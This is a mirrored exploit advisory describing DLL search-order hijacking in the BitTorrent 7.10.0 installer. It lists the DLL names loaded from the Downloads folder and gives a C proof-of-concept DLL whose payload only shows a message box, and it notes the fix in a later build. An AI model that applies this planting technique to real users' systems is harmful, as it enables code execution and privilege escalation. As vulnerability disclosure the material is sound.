首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Bittorrent 7.10.0 (Build 43581) Installer DLL Hijacking
来源:https://thel3l.me 作者:Jayasimha 发布时间:2017-08-01  
# Exploit Title: Bittorrent 7.10.0 (Build 43581) Installer DLL Search Order Hijack - "WININET.dll", "DNSAPI.dll", others
# Date of Discovery: July 21 2017
# Exploit Author: Rithwik Jayasimha
# Author Homepage/Contact: https://thel3l.me
# Vendor Name: Bittorrent Inc.
# Vendor Homepage: https://www.bittorrent.com
# Software Link: http://download-new.utorrent.com/endpoint/bittorrent/os/windows/track/stable/
# Affected Versions: <=7.10.0.43581
# Tested on: Windows 10, 8.1 x64
# Category: local
# Vulnerability type: Local Privilege Escalation/Code Execution


# Description:


	Bittorrent versions <=7.10.0 Build 43581 automatically search for "WININET.dll", "DNSAPI.dll", "MSIMG32.dll", "CRYPTSP.dll", "bcrypt.dll" and "PHLPAPI.dll"
	among others from the installer download location.
	This allows a malicious attacker to potentially create these files in the directory resulting in them being run on installer execution.
	(code execution, local privilege escalation)
			C:\Users\<username>\Downloads\WININET.dll
			C:\Users\<username>\Downloads\msls31.dll
			C:\Users\<username>\Downloads\USP10.dll
			C:\Users\<username>\Downloads\CRYPTSP.dll
			C:\Users\<username>\Downloads\bcrypt.dll
			C:\Users\<username>\Downloads\PHLPAPI.dll


# Proof Of Concept:
	1. Compile, place in vulnerable location and run bittorrent.exe

		#include <windows.h>
		#define DllExport __declspec (dllexport)
		BOOL WINAPI  DllMain (
		            HANDLE    hinstDLL,
		            DWORD     fdwReason,
		            LPVOID    lpvReserved)
		{
		  dll_hijack();
		  return 0;
		}
		int dll_hijack()
		{
		  MessageBox(0, "Bittorrent 7.10.0.43581 DLL Hijacking PoC", "DLL Message", MB_OK);
		  return 0;
		}

# Additional Notes, References and links:

# Disclosure Timeline:
    This issue was remedied in BitTorrent 7.10.0 For Windows (build 43917)

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Jenkins < 1.650 - Java Deseria
·GitHub Enterprise < 2.8.7 - Re
·AudioCoder 0.8.46 - Local Buff
·MediaCoder 0.8.48.5888 - Local
·Microsoft Windows - LNK Shortc
·VICIdial 2.9 RC 1 to 2.13 RC1
·IPFire < 2.19 Update Core 110
·Razer Synapse 2.20.15.1104 - r
·ManageEngine Desktop Central 1
·MAWK 1.3.3-17 - Local Buffer O
·Microsoft Internet Explorer -
·Easy Chat Server User Register
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved